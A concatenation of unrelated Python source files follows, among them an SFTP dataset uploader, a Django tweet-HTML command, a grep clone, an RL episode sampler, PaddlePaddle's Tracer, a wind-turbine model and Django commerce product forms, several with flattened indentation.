remote_subdir = os.path.join(dset_name, r_m).replace('\\', '/')
try:
sftp.stat(remote_subdir)
except:
sftp.mkdir(remote_subdir)
for file in files:
local_dir_path = os.path.join(root, file).replace('\\', '/')
l_d_p = local_dir_path.split("/")
r_d_p = l_d_p[len(r_d):]
r_d_p = "/".join(r_d_p)
remote_dir_path = os.path.join(dset_name, r_d_p).replace('\\', '/')
Log.info('Start to sftp dataset: `%s` ==> `%s`' %
(local_dir_path,
os.path.join(root_dir, remote_dir_path).replace('\\', '/')))
try:
sftp.stat(remote_dir_path)
except:
sftp.put(local_dir_path, remote_dir_path)
transport.close()
def get_dependences_by_module_name(module_name):
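    # Import the module in a disposable child process (Pool of size 1) so the
    # sys.modules scan in __help_func does not pollute this process's imports.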
import multiprocessing
with multiprocessing.Pool(1) as p:
res = p.map(__help_func, (module_name,))[0]
return res
def get_training_file_dependences():
f_list = list(filter(lambda x: not x.startswith(os.path.join(get_transfer_local_path(), 'runtime')) and
not x.startswith(os.path.join(get_transfer_local_path(), 'venv')) and
not x.startswith(os.path.join(get_transfer_local_path(), '__pycache__')),
glob.iglob(os.path.join(get_transfer_local_path(), '**/*.py'),
recursive=True))) + \
list(filter(lambda x: not x.startswith(os.path.join(get_transfer_local_path(), 'runtime')) and
not x.startswith(os.path.join(get_transfer_local_path(), '__pycache__')),
glob.iglob(os.path.join(get_transfer_local_path(), '**/*.ini'),
recursive=True)))
if platform.system() == 'Windows':
res = {
_.replace(get_transfer_local_path() + '\\', ''):
_.replace(get_transfer_local_path() + '\\', '')
for _ in f_list}
else:
res = {
_.replace(get_transfer_local_path() + '/', ''):
_.replace(get_transfer_local_path() + '/', '')
for _ in f_list}
return res
def get_all_edl_modules():
"""Get name and relative path of the modules in edl project
"""
res = {}
for k, v in sys.modules.items():
if hasattr(v, '__file__'):
if v is not None:
try:
if v.__file__ and 'site-packages' in getattr(v, '__file__'):
pass
else:
project_dir = get_local_path()
if v.__file__ and v.__file__.startswith(project_dir):
res[k] = v.__file__.replace(project_dir + '/', '')
except Exception:
import pdb
pdb.set_trace()
else:
pass
return res
def __help_func(module_name):
importlib.import_module('.', module_name)
res = get_all_edl_modules()
return res
if __name__ == '__main__':
print(get_training_file_dependences())
|
python
|
# coding: utf-8
from django.core.management.base import BaseCommand, CommandError
from ...models import Account, Tweet
class Command(BaseCommand):
"""Generates the HTML version of all the Tweets.
Does this by re-saving every Tweet, one-by-one.
For one account:
./manage.py generate_tweet_html --account=philgyford
For all accounts:
./manage.py generate_tweet_html
"""
help = "Generates the HTML version of all the Tweets."
def add_arguments(self, parser):
parser.add_argument(
"--account",
action="store",
default=False,
help="Only generate for one Twitter account.",
)
def handle(self, *args, **options):
tweets = Tweet.objects.all()
# If a screen name is provided, only get the Tweets for that:
if options["account"]:
screen_name = options["account"]
try:
Account.objects.get(user__screen_name=screen_name)
except Account.DoesNotExist:
raise CommandError(
"There's no Account with a screen name of '%s'" % screen_name
)
tweets = tweets.filter(user__screen_name=screen_name)
for tweet in tweets:
tweet.save()
if options.get("verbosity", 1) > 0:
self.stdout.write("Generated HTML for %d Tweets" % tweets.count())
|
python
|
import pytest
@pytest.fixture
def supply_AA_BB_CC():
    aa = 25
    bb = 35
    cc = 45
    return [aa, bb, cc]
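# Example test (sketch): pytest injects the fixture by matching the argument name.
def test_supply_AA_BB_CC(supply_AA_BB_CC):
    assert supply_AA_BB_CC == [25, 35, 45]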
|
python
|
#!/usr/pkg/bin/python2.7
from __future__ import print_function
# grep: search for string patterns in files
import sys
import os
import argparse
import re
def _fg(file, pattern, ops):
with open(file, 'r') as f:
text = f.readlines()
z = len(text)
for i in range(z):
line = text[i]
        result = pattern.search(line)
        if result:
            if ops.B:
                # -B: print the leading (preceding) lines
                j = min(ops.B_num, i)
                print(''.join(text[i-j:i]), end='')
            print(line, end='')
            if ops.A:
                # -A: print the trailing (following) lines
                j = min(ops.A_num, z - 1 - i)
                print(''.join(text[i+1:i+j+1]), end='')
def _grep(args):
    pattern = re.compile(args.pattern, re.IGNORECASE if args.i else 0)
for file in args.files:
_fg(file, pattern, args)
def main(argv):
# Initialize parser #
parser = argparse.ArgumentParser()
# Add options #
parser.add_argument('-A', dest='A_num', action='store', type=int,
                        help='Prints trailing lines for each match')
parser.add_argument('-B', dest='B_num', action='store', type=int,
help='Prints leading lines for each match')
parser.add_argument('-i', action='store_true',
help='Makes pattern case insensitive')
parser.add_argument('files', nargs=argparse.REMAINDER)
argv = parser.parse_args()
argv.A = False
argv.B = False
if argv.A_num:
argv.A = True
if argv.B_num:
argv.B = True
if len(argv.files) < 2:
parser.print_help()
return
argv.pattern = argv.files[0]
argv.files = argv.files[1:]
_grep(args=argv)
if __name__ == '__main__':
main(sys.argv)
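# Example invocations (sketch):
#   python grep.py -i pattern file1.txt file2.txt
#   python grep.py -A 2 -B 1 'def main' script.py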
|
python
|
from collections import defaultdict
import dill
import numpy as np
import time
import torch.multiprocessing as mp
mp.set_sharing_strategy('file_system')
from starter_code.infrastructure.log import renderfn
from starter_code.sampler.hierarchy_utils import flatten_rewards, build_interval_tree, set_transformation_ids, get_subreturns_matrix, redistribute_rewards_recursive, visualize_episode_data, visualize_hrl_finish_episode
from starter_code.interfaces.interfaces import StepOutput, PolicyTransformParams
from starter_code.organism.domain_specific import preprocess_state_before_forward
def collect_train_samples_serial(epoch, max_steps, objects, pid=0, queue=None):
"""
Purpose: collect rollouts for max_steps steps
Return: stats_collector
"""
env = objects['env']
stats_collector = objects['stats_collector_builder']()
sampler = objects['sampler']
max_episode_length = objects['max_episode_length']
seed = int(1e6)*objects['seed'] + pid
env.seed(seed)
start = time.time()
num_steps = 0
while num_steps < max_steps:
max_steps_this_episode = min(max_steps - num_steps, max_episode_length)
episode_data = sampler.sample_episode(env=env, max_steps_this_episode=max_steps_this_episode)
stats_collector.append(episode_data)
num_steps += len(episode_data) # this is actually the number of high level timesteps
end = time.time()
objects['printer']('PID: {} Time to collect samples: {}'.format(pid, end-start))
if queue is not None:
queue.put([pid, stats_collector.data])
else:
return stats_collector
def collect_train_samples_parallel(epoch, max_steps, objects, num_workers=10):
"""
Purpose: collect rollouts for max_steps steps using num_workers workers
Return: stats_collector
"""
num_steps_per_worker = max_steps // num_workers
num_residual_steps = max_steps - num_steps_per_worker * num_workers
queue = mp.Manager().Queue()
workers = []
for i in range(num_workers):
worker_steps = num_steps_per_worker + num_residual_steps if i == 0 else num_steps_per_worker
worker_kwargs = dict(
epoch=epoch,
max_steps=worker_steps,
objects=objects,
pid=i+1,
queue=queue)
workers.append(mp.Process(target=collect_train_samples_serial, kwargs=worker_kwargs))
for j, worker in enumerate(workers):
worker.start()
start = time.time()
master_stats_collector = objects['stats_collector_builder']()
for j, worker in enumerate(workers):
worker_pid, worker_stats_data = queue.get()
master_stats_collector.extend(worker_stats_data)
end = time.time()
objects['printer']('Time to extend master_stats_collector: {}'.format(end-start))
for j, worker in enumerate(workers):
worker.join()
assert master_stats_collector.get_total_steps() == max_steps
return master_stats_collector
def step_agent(env, organism, state, step_info_builder, transform_params):
render = transform_params.render
if render: frame = renderfn(env=env, scale=1)
processed_state = preprocess_state_before_forward(state)
organism_output = organism.forward(processed_state, deterministic=transform_params.deterministic)
transform_params = transform_params if organism_output.action.is_subpolicy else None
transform_output = organism_output.action.transform(
state=state,
env=env,
transform_params=transform_params)
step_info = step_info_builder(
state=state,
organism_output=organism_output,
next_state=transform_output.next_state,
info=transform_output.transform_node
)
if render:
step_info.frame = frame
step_info.mask = 0 if transform_output.done else 1
step_output = StepOutput(
done=transform_output.done,
step_info=step_info,
option_length=transform_output.transform_node.get_length())
return transform_output.next_state, step_output
class Sampler():
def __init__(self, organism, step_info, deterministic):
self.organism = organism
self.deterministic = deterministic
self.step_info_builder = step_info
def begin_episode(self, env):
state = env.reset()
return state
def finish_episode(self, state, episode_data, env):
# 1. flatten reward
reward_chain = flatten_rewards(episode_data)
# 2. identify the index of the start and end of its chain
interval_tree = build_interval_tree(episode_data)
# 3. Set the index of the agents for t and t+1
set_transformation_ids(interval_tree)
# 4. get subreturns matrix
subreturns_matrix = get_subreturns_matrix(reward_chain, self.organism.args.gamma)
if self.organism.args.hrl_verbose:
visualize_hrl_finish_episode(episode_data, interval_tree, reward_chain, subreturns_matrix)
# 5. re-distribute rewards
redistribute_rewards_recursive(episode_data, subreturns_matrix)
return episode_data
def trim_step_infos(self, episode_data):
for step in episode_data:
if not step.hierarchy_info.leaf:
setattr(step.hierarchy_info, 'organism', step.hierarchy_info.organism.id_num)
self.trim_step_infos(step.hierarchy_info.path_data)
return episode_data
def get_bids_for_episode(self, episode_data):
        episode_bids = defaultdict(list)
for step in episode_data:
probs = step['action_dist']
for index, prob in enumerate(probs):
episode_bids[index].append(prob)
return episode_bids
def step_through_episode(self, state, env, max_steps_this_episode, render):
episode_data = []
global_clock = 0
while global_clock < max_steps_this_episode:
max_steps_this_option = max_steps_this_episode - global_clock
state, step_output = step_agent(
env=env,
organism=self.organism,
state=state,
step_info_builder=self.step_info_builder,
transform_params=PolicyTransformParams(
max_steps_this_option=max_steps_this_option,
deterministic=self.deterministic,
render=render)
)
episode_data.append(step_output.step_info)
if step_output.done:
break
global_clock += step_output.option_length
step_output.step_info.next_frame = renderfn(env=env, scale=1) # render last frame
if not step_output.done:
assert global_clock == max_steps_this_episode
return state, episode_data
def sample_episode(self, env, max_steps_this_episode, render=False):
state = self.begin_episode(env)
state, episode_data = self.step_through_episode(
state, env, max_steps_this_episode, render)
episode_data = self.finish_episode(state, episode_data, env)
episode_data = self.trim_step_infos(episode_data)
if self.organism.args.hrl_verbose:
visualize_episode_data(episode_data)
return episode_data
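# Usage sketch (illustrative; the organism, step-info builder, and env come
# from the caller's training setup):
#
#   sampler = Sampler(organism=agent, step_info=step_info_builder,
#                     deterministic=False)
#   episode_data = sampler.sample_episode(env=env, max_steps_this_episode=1000)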
|
python
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import six
from collections import defaultdict
from paddle.fluid import core
from paddle.fluid import framework
from paddle import _C_ops
final_state_name_mapping = {
"matmul_v2": {
"final_op_name": "final_state_matmul",
"transpose_x": "trans_x",
"transpose_y": "trans_y",
"x": "X",
"y": "Y",
"out": "Out",
},
# "elementwise_add": {
# "final_op_name": "final_state_add",
# "x": "X",
# "y": "Y",
# },
"trunc": {
"final_op_name": "final_state_trunc",
"x": "X",
"out": "Out",
},
"pool2d": {
"final_op_name": "final_state_pool2d",
"x": "X",
"kernel_size": "ksize",
"out": "Out",
},
"abs": {
"final_op_name": "final_state_abs",
"x": "X",
"out": "Out",
},
"digamma": {
"final_op_name": "final_state_digamma",
"x": "X",
"out": "Out",
},
"diagonal": {
"final_op_name": "final_state_diagonal",
"x": "Input",
"offset": "offset",
"axis1": "axis1",
"axis2": "axis2",
"out": "Out",
},
"one_hot": {
"final_op_name": "final_state_one_hot",
"x": "X",
"num_class": "depth",
"out": "Out",
}
}
class Tracer(core.Tracer):
"""
:api_attr: imperative
Tracer is used to execute and record the operators executed, to construct the
    computation graph in dygraph mode. Tracer has two modes, :code:`train_mode`
    and :code:`eval_mode`. In :code:`train_mode`, Tracer would add the backward
    network automatically and perform AutoGrad via :code:`loss.backward()`.
    In :code:`eval_mode`, Tracer would not add the backward network.
    This is a low-level API; users don't need to use it directly.
"""
def __init__(self):
super(Tracer, self).__init__()
self._train_mode = True
def eager_trace_op(self,
type,
inputs,
outputs,
attrs,
stop_gradient=False,
inplace_map=None):
function_ptr = _C_ops.__dict__[type]
core_ops_args_info = _C_ops.get_core_ops_args_info()
core_ops_args_type_info = _C_ops.get_core_ops_args_type_info()
core_ops_returns_info = _C_ops.get_core_ops_returns_info()
op_args = core_ops_args_info[type]
op_args_type = core_ops_args_type_info[type]
op_returns = core_ops_returns_info[type]
arg_list = []
for i in range(len(op_args)):
arg_name = op_args[i]
arg_type = op_args_type[i]
if arg_name in inputs.keys():
arg_to_append = inputs[arg_name]
elif arg_name in outputs.keys():
arg_to_append = outputs[arg_name]
else:
if "Num" in arg_name:
# Remove "Num" suffix to get out_name
out_name = arg_name[:-3]
assert out_name in outputs.keys()
num_outs = len(outputs[out_name])
arg_to_append = num_outs
else:
arg_to_append = None
if arg_to_append is None:
arg_list.append(arg_to_append)
elif arg_type == "tensor":
if isinstance(arg_to_append, list):
arg_list.append(arg_to_append[0])
else:
arg_list.append(arg_to_append)
elif arg_type == "list":
assert isinstance(arg_to_append, list)
arg_list.append(arg_to_append)
else:
assert arg_type == "int"
assert isinstance(arg_to_append, int)
arg_list.append(arg_to_append)
attrs_list = []
for k, v in attrs.items():
attrs_list.append(k)
attrs_list.append(v)
returns = function_ptr(*arg_list, *attrs_list)
if isinstance(returns, tuple):
for i in range(len(op_returns)):
retname = op_returns[i]
if retname in outputs.keys():
# Replaced outputs by function returns
if isinstance(returns[i], list):
for j in range(len(returns[i])):
outputs[retname][j].reconstruct_from_(returns[i][j],
False)
else:
if isinstance(outputs[retname], list):
outputs[retname][0].reconstruct_from_(returns[i],
False)
else:
outputs[retname].reconstruct_from_(returns[i],
False)
elif isinstance(returns, list):
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
for j in range(len(returns)):
outputs[key][j].reconstruct_from_(returns[j], False)
else:
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
if isinstance(outputs[key], list):
outputs[key][0].reconstruct_from_(returns, False)
else:
outputs[key].reconstruct_from_(returns, False)
def eager_final_state_trace_op(self,
type,
inputs,
outputs,
attrs,
stop_gradient=False,
inplace_map=None):
assert type in final_state_name_mapping.keys()
final_state_type = final_state_name_mapping[type]["final_op_name"]
function_ptr = _C_ops.__dict__[final_state_type]
core_ops_args_info = _C_ops.get_final_state_core_ops_args_info()
core_ops_args_type_info = _C_ops.get_final_state_core_ops_args_type_info(
)
core_ops_returns_info = _C_ops.get_final_state_core_ops_returns_info()
op_args = core_ops_args_info[final_state_type]
op_args_type = core_ops_args_type_info[final_state_type]
op_returns = core_ops_returns_info[final_state_type]
arg_list = []
for i in range(len(op_args)):
eager_arg_name = op_args[i]
arg_type = op_args_type[i]
assert eager_arg_name in final_state_name_mapping[type].keys()
arg_name = final_state_name_mapping[type][eager_arg_name]
if arg_name in inputs.keys():
arg_to_append = inputs[arg_name]
elif arg_name in outputs.keys():
arg_to_append = outputs[arg_name]
elif arg_name in attrs.keys() and arg_type == "":
arg_to_append = attrs[arg_name]
else:
# dispensable
arg_to_append = None
if arg_type == "":
# attribute
arg_list.append(arg_to_append)
elif arg_type == "tensor":
if isinstance(arg_to_append, list):
arg_list.append(arg_to_append[0])
else:
arg_list.append(arg_to_append)
elif arg_type == "list":
assert isinstance(arg_to_append, list)
arg_list.append(arg_to_append)
else:
assert arg_to_append is None
arg_list.append(arg_to_append)
returns = function_ptr(*arg_list)
if isinstance(returns, tuple):
for i in range(len(op_returns)):
eager_retname = op_returns[i]
assert eager_retname in final_state_name_mapping[type].keys()
retname = final_state_name_mapping[type][eager_retname]
if retname in outputs.keys():
# Replaced outputs by function returns
if isinstance(returns[i], list):
for j in range(len(returns[i])):
outputs[retname][j].reconstruct_from_(returns[i][j],
False)
else:
outputs[retname][0].reconstruct_from_(returns[i], False)
elif isinstance(returns, list):
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
for j in range(len(returns)):
outputs[key][j].reconstruct_from_(returns[j], False)
else:
assert len(outputs.keys()) == 1
key = list(outputs.keys())[0]
if isinstance(outputs[key], list):
outputs[key][0].reconstruct_from_(returns, False)
else:
outputs[key].reconstruct_from_(returns, False)
def trace_op(self,
type,
inputs,
outputs,
attrs,
stop_gradient=False,
inplace_map=None):
if not framework._in_legacy_dygraph():
# inputs : {"sum": [tensor], ...}
# outputs : {"sum": [tensor], ...}
if type in final_state_name_mapping.keys():
final_state_type = final_state_name_mapping[type][
"final_op_name"]
assert final_state_type in _C_ops.__dict__
self.eager_final_state_trace_op(type, inputs, outputs, attrs,
stop_gradient, inplace_map)
else:
self.eager_trace_op(type, inputs, outputs, attrs, stop_gradient,
inplace_map)
else:
self.trace(type, inputs, outputs, attrs,
framework._current_expected_place(), self._has_grad and
not stop_gradient, inplace_map if inplace_map else {})
def train_mode(self):
self._train_mode = True
def eval_mode(self):
self._train_mode = False
|
python
|
#-*- coding:utf-8 -*-
# 2.2 Variables
message = "Hello Python world!"
print(message)
message = "现在的时间是:2021年6月11日21:07:18"
print(message)
# 2.3 Strings
name = "ada love lace"
print(name.title())
print(name.upper())
print(name.lower())
first_name = "ada"
last_name = "love lace"
full_name = first_name + last_name
print(full_name)
print("Python:\nC:\nObject\n")
print(len(' python '))
print(len(' python '.rstrip()))
print(len(' python '.lstrip()))
print(len(' python '.strip()))
my_name = "my name's liuhanyu"
the_name = 'my "name" is liuhanyu'
# 2.4 Numbers
print(2 + 3)
print(2 - 3)
print(2 * 3)
print(2 / 3)
print(2 % 3)
# Exponentiation
print(2 ** 3)
# Operator precedence
print(2 + 3 ** 2 / 2 - 1)
print(0.1 + 0.2) # the number of decimal places can look odd (floating point); nothing to worry about
age = 23
print("Happy " + str(age) + 'rd Birthday!')
print(3 / 2)
print(3 / 2.0)
|
python
|
from .model_108_basicDdSt import BasicDdSt
|
python
|
import numpy as np
from py_wake.site._site import UniformWeibullSite
from py_wake.wind_turbines import OneTypeWindTurbines
wt_x = [134205, 134509, 134813, 135118, 135423]
wt_y = [538122, 538095, 538067, 538037, 538012]
power_curve = np.array([[3.0, 0.0],
[4.0, 15.0],
[5.0, 121.0],
[6.0, 251.0],
[7.0, 433.0],
[8.0, 667.0],
[9.0, 974.0],
[10.0, 1319.0],
[11.0, 1675.0],
[12.0, 2004.0],
[13.0, 2281.0],
[14.0, 2463.0],
[15.0, 2500.0],
[16.0, 2500.0],
[17.0, 2500.0],
[18.0, 2500.0],
[19.0, 2500.0],
[20.0, 2500.0],
[21.0, 2500.0],
[22.0, 2500.0],
[23.0, 2500.0],
[24.0, 2500.0],
[25.0, 2500.0]])
# Calculated ct curve using PHATAS (BEM code from ECN)
ct_curve = np.array([[3.0, 0.0],
[4.0, 0.85199],
[5.0, 0.85199],
[6.0, 0.80717],
[7.0, 0.78455],
[8.0, 0.76444],
[9.0, 0.72347],
[10.0, 0.66721],
[11.0, 0.62187],
[12.0, 0.57274],
[13.0, 0.50807],
[14.0, 0.42737],
[15.0, 0.33182],
[16.0, 0.26268],
[17.0, 0.21476],
[18.0, 0.18003],
[19.0, 0.15264],
[20.0, 0.13089],
[21.0, 0.11374],
[22.0, 0.09945],
[23.0, 0.08766],
[24.0, 0.07796],
[25.0, 0.06971]])
class N80(OneTypeWindTurbines):
def __init__(self):
OneTypeWindTurbines.__init__(self, 'N80', diameter=80.0, hub_height=80.0,
ct_func=self._ct, power_func=self._power, power_unit='kW')
def _ct(self, u):
return np.interp(u, ct_curve[:, 0], ct_curve[:, 1])
def _power(self, u):
return np.interp(u, power_curve[:, 0], power_curve[:, 1])
def main():
if __name__ == '__main__':
wt = N80()
print('Diameter', wt.diameter())
print('Hub height', wt.hub_height())
ws = np.arange(3, 25)
import matplotlib.pyplot as plt
plt.plot(ws, wt.power(ws), '.-')
plt.show()
main()
|
python
|
import unittest
class Solution:
def hIndex(self, citations):
"""
:type citations: List[int]
:rtype: int
"""
if not citations:
return 0
citations.sort(reverse=True)
h = 0
for i in citations:
if i > h:
h += 1
else:
break
return h
class Test(unittest.TestCase):
def test(self):
self._test([3, 0, 6, 1, 5], 3)
self._test([2, 1], 1)
def _test(self, citations, expected):
actual = Solution().hIndex(citations)
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
|
python
|
# -*- coding: utf-8 -*-
"""Console script for rps."""
import click
from .log import get_log
import asyncio
from .server import Site
from .api import start
def validate_url(ctx, param, value):
try:
return value
except ValueError:
raise click.BadParameter('url need to be format: tcp://ipv4:port')
@click.command()
@click.option('--unit_id', default=1,
envvar='UNIT_ID',
help='the NM’s Unit ID, ENV: UNIT_ID, default: 1')
@click.option('--device_type', default='plc_430',
envvar='DEVICE_TYPE',
help='NM_DeviceType, also ENV: DEVICE_TYPE')
@click.option('--port', default=80,
envvar='SVC_PORT',
help='Api port, default=80, ENV: SVC_PORT')
@click.option('--debug', is_flag=True)
def main(unit_id, device_type, port, debug):
click.echo("See more documentation at http://www.mingvale.com")
info = {
'unit_id': unit_id,
'device_type': device_type,
'api_port': port,
}
log = get_log(debug)
log.info('Basic Information: {}'.format(info))
loop = asyncio.get_event_loop()
loop.set_debug(0)
    api_task = None
    try:
site = Site(unit_id, device_type, loop)
site.start()
api_task = loop.create_task(start(port, site))
loop.run_forever()
except OSError as e:
log.error(e)
except KeyboardInterrupt:
if api_task:
api_task.cancel()
loop.run_until_complete(api_task)
finally:
loop.stop()
loop.close()
|
python
|
from .controllers.product import ProductController
from .models import commerce
from .models import inventory
from django import forms
from django.db.models import Q
class ApplyCreditNoteForm(forms.Form):
required_css_class = 'label-required'
def __init__(self, user, *a, **k):
''' User: The user whose invoices should be made available as
choices. '''
self.user = user
super(ApplyCreditNoteForm, self).__init__(*a, **k)
self.fields["invoice"].choices = self._unpaid_invoices
def _unpaid_invoices(self):
invoices = commerce.Invoice.objects.filter(
status=commerce.Invoice.STATUS_UNPAID,
).select_related("user")
invoices_annotated = [invoice.__dict__ for invoice in invoices]
users = dict((inv.user.id, inv.user) for inv in invoices)
for invoice in invoices_annotated:
invoice.update({
"user_id": users[invoice["user_id"]].id,
"user_email": users[invoice["user_id"]].email,
})
key = lambda inv: (0 - (inv["user_id"] == self.user.id), inv["id"]) # noqa
invoices_annotated.sort(key=key)
template = (
'Invoice %(id)d - user: %(user_email)s (%(user_id)d) '
'- $%(value)d'
)
return [
(invoice["id"], template % invoice)
for invoice in invoices_annotated
]
invoice = forms.ChoiceField(
required=True,
)
verify = forms.BooleanField(
required=True,
help_text="Have you verified that this is the correct invoice?",
)
class CancellationFeeForm(forms.Form):
required_css_class = 'label-required'
percentage = forms.DecimalField(
required=True,
min_value=0,
max_value=100,
)
class ManualCreditNoteRefundForm(forms.ModelForm):
required_css_class = 'label-required'
class Meta:
model = commerce.ManualCreditNoteRefund
fields = ["reference"]
class ManualPaymentForm(forms.ModelForm):
required_css_class = 'label-required'
class Meta:
model = commerce.ManualPayment
fields = ["reference", "amount"]
# Products forms -- none of these have any fields: they are to be subclassed
# and the fields added as needed. ProductsForm (the function) is responsible
# for the subclassing.
def ProductsForm(category, products):
''' Produces an appropriate _ProductsForm subclass for the given render
type. '''
# Each Category.RENDER_TYPE value has a subclass here.
cat = inventory.Category
RENDER_TYPES = {
cat.RENDER_TYPE_QUANTITY: _QuantityBoxProductsForm,
cat.RENDER_TYPE_RADIO: _RadioButtonProductsForm,
cat.RENDER_TYPE_ITEM_QUANTITY: _ItemQuantityProductsForm,
cat.RENDER_TYPE_CHECKBOX: _CheckboxProductsForm,
}
# Produce a subclass of _ProductsForm which we can alter the base_fields on
class ProductsForm(RENDER_TYPES[category.render_type]):
pass
products = list(products)
products.sort(key=lambda prod: prod.order)
ProductsForm.set_fields(category, products)
if category.render_type == inventory.Category.RENDER_TYPE_ITEM_QUANTITY:
ProductsForm = forms.formset_factory(
ProductsForm,
formset=_ItemQuantityProductsFormSet,
)
return ProductsForm
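# Illustrative usage sketch (names are hypothetical): the factory returns a
# class, which is then instantiated like any other form; existing cart
# contents can be passed as "product_quantities", a sequence of
# (product, quantity) pairs consumed by _HasProductsFields below.
#
#   FormClass = ProductsForm(category, products)
#   form = FormClass(request.POST or None,
#                    product_quantities=cart.product_quantities())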
class _HasProductsFields(object):
    ''' Base class for product entry forms. '''
    PRODUCT_PREFIX = "product_"
def __init__(self, *a, **k):
if "product_quantities" in k:
initial = self.initial_data(k["product_quantities"])
k["initial"] = initial
del k["product_quantities"]
super(_HasProductsFields, self).__init__(*a, **k)
@classmethod
def field_name(cls, product):
return cls.PRODUCT_PREFIX + ("%d" % product.id)
@classmethod
def set_fields(cls, category, products):
''' Sets the base_fields on this _ProductsForm to allow selecting
from the provided products. '''
pass
@classmethod
    def initial_data(cls, product_quantities):
''' Prepares initial data for an instance of this form.
product_quantities is a sequence of (product,quantity) tuples '''
return {}
def product_quantities(self):
''' Yields a sequence of (product, quantity) tuples from the
cleaned form data. '''
return iter([])
    def add_product_error(self, product, error):
        ''' Adds an error to the given product's field. '''
        self.add_error(self.field_name(product), error)
class _ProductsForm(_HasProductsFields, forms.Form):
required_css_class = 'label-required'
pass
class _QuantityBoxProductsForm(_ProductsForm):
''' Products entry form that allows users to enter quantities
of desired products. '''
@classmethod
def set_fields(cls, category, products):
for product in products:
if product.description:
help_text = "$%d each -- %s" % (
product.price,
product.description,
)
else:
help_text = "$%d each" % product.price
field = forms.IntegerField(
label=product.name,
help_text=help_text,
min_value=0,
max_value=500, # Issue #19. We should figure out real limit.
)
cls.base_fields[cls.field_name(product)] = field
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
initial[cls.field_name(product)] = quantity
return initial
def product_quantities(self):
for name, value in self.cleaned_data.items():
if name.startswith(self.PRODUCT_PREFIX):
product_id = int(name[len(self.PRODUCT_PREFIX):])
yield (product_id, value)
class _RadioButtonProductsForm(_ProductsForm):
''' Products entry form that allows users to enter quantities
of desired products. '''
FIELD = "chosen_product"
@classmethod
def set_fields(cls, category, products):
choices = []
for product in products:
choice_text = "%s -- $%d" % (product.name, product.price)
choices.append((product.id, choice_text))
if not category.required:
choices.append((0, "No selection"))
cls.base_fields[cls.FIELD] = forms.TypedChoiceField(
label=category.name,
widget=forms.RadioSelect,
choices=choices,
empty_value=0,
coerce=int,
)
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
if quantity > 0:
initial[cls.FIELD] = product.id
break
return initial
def product_quantities(self):
ours = self.cleaned_data[self.FIELD]
choices = self.fields[self.FIELD].choices
for choice_value, choice_display in choices:
if choice_value == 0:
continue
yield (
choice_value,
1 if ours == choice_value else 0,
)
def add_product_error(self, product, error):
self.add_error(self.FIELD, error)
class _CheckboxProductsForm(_ProductsForm):
''' Products entry form that allows users to say yes or no
to desired products. Basically, it's a quantity form, but the quantity
is either zero or one.'''
@classmethod
def set_fields(cls, category, products):
for product in products:
field = forms.BooleanField(
                label='%s -- $%d' % (product.name, product.price),
required=False,
)
cls.base_fields[cls.field_name(product)] = field
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
initial[cls.field_name(product)] = bool(quantity)
return initial
def product_quantities(self):
for name, value in self.cleaned_data.items():
if name.startswith(self.PRODUCT_PREFIX):
product_id = int(name[len(self.PRODUCT_PREFIX):])
yield (product_id, int(value))
class _ItemQuantityProductsForm(_ProductsForm):
''' Products entry form that allows users to select a product type, and
enter a quantity of that product. This version _only_ allows a single
product type to be purchased. This form is usually used in concert with
the _ItemQuantityProductsFormSet to allow selection of multiple
products.'''
CHOICE_FIELD = "choice"
QUANTITY_FIELD = "quantity"
@classmethod
def set_fields(cls, category, products):
choices = []
if not category.required:
choices.append((0, "---"))
for product in products:
choice_text = "%s -- $%d each" % (product.name, product.price)
choices.append((product.id, choice_text))
cls.base_fields[cls.CHOICE_FIELD] = forms.TypedChoiceField(
label=category.name,
widget=forms.Select,
choices=choices,
initial=0,
empty_value=0,
coerce=int,
)
cls.base_fields[cls.QUANTITY_FIELD] = forms.IntegerField(
label="Quantity", # TODO: internationalise
min_value=0,
max_value=500, # Issue #19. We should figure out real limit.
)
@classmethod
def initial_data(cls, product_quantities):
initial = {}
for product, quantity in product_quantities:
if quantity > 0:
initial[cls.CHOICE_FIELD] = product.id
initial[cls.QUANTITY_FIELD] = quantity
break
return initial
def product_quantities(self):
our_choice = self.cleaned_data[self.CHOICE_FIELD]
our_quantity = self.cleaned_data[self.QUANTITY_FIELD]
choices = self.fields[self.CHOICE_FIELD].choices
for choice_value, choice_display in choices:
if choice_value == 0:
continue
yield (
choice_value,
our_quantity if our_choice == choice_value else 0,
)
def add_product_error(self, product, error):
if self.CHOICE_FIELD not in self.cleaned_data:
return
if product.id == self.cleaned_data[self.CHOICE_FIELD]:
self.add_error(self.CHOICE_FIELD, error)
self.add_error(self.QUANTITY_FIELD, error)
class _ItemQuantityProductsFormSet(_HasProductsFields, forms.BaseFormSet):
required_css_class = 'label-required'
@classmethod
def set_fields(cls, category, products):
raise ValueError("set_fields must be called on the underlying Form")
@classmethod
def initial_data(cls, product_quantities):
''' Prepares initial data for an instance of this form.
product_quantities is a sequence of (product,quantity) tuples '''
f = [
{
_ItemQuantityProductsForm.CHOICE_FIELD: product.id,
_ItemQuantityProductsForm.QUANTITY_FIELD: quantity,
}
for product, quantity in product_quantities
if quantity > 0
]
return f
def product_quantities(self):
''' Yields a sequence of (product, quantity) tuples from the
cleaned form data. '''
products = set()
# Track everything so that we can yield some zeroes
all_products = set()
for form in self:
if form.empty_permitted and not form.cleaned_data:
# This is the magical empty form at the end of the list.
continue
for product, quantity in form.product_quantities():
all_products.add(product)
if quantity == 0:
continue
if product in products:
form.add_error(
_ItemQuantityProductsForm.CHOICE_FIELD,
"You may only choose each product type once.",
)
form.add_error(
_ItemQuantityProductsForm.QUANTITY_FIELD,
"You may only choose each product type once.",
)
products.add(product)
yield product, quantity
for product in (all_products - products):
yield product, 0
def add_product_error(self, product, error):
for form in self.forms:
form.add_product_error(product, error)
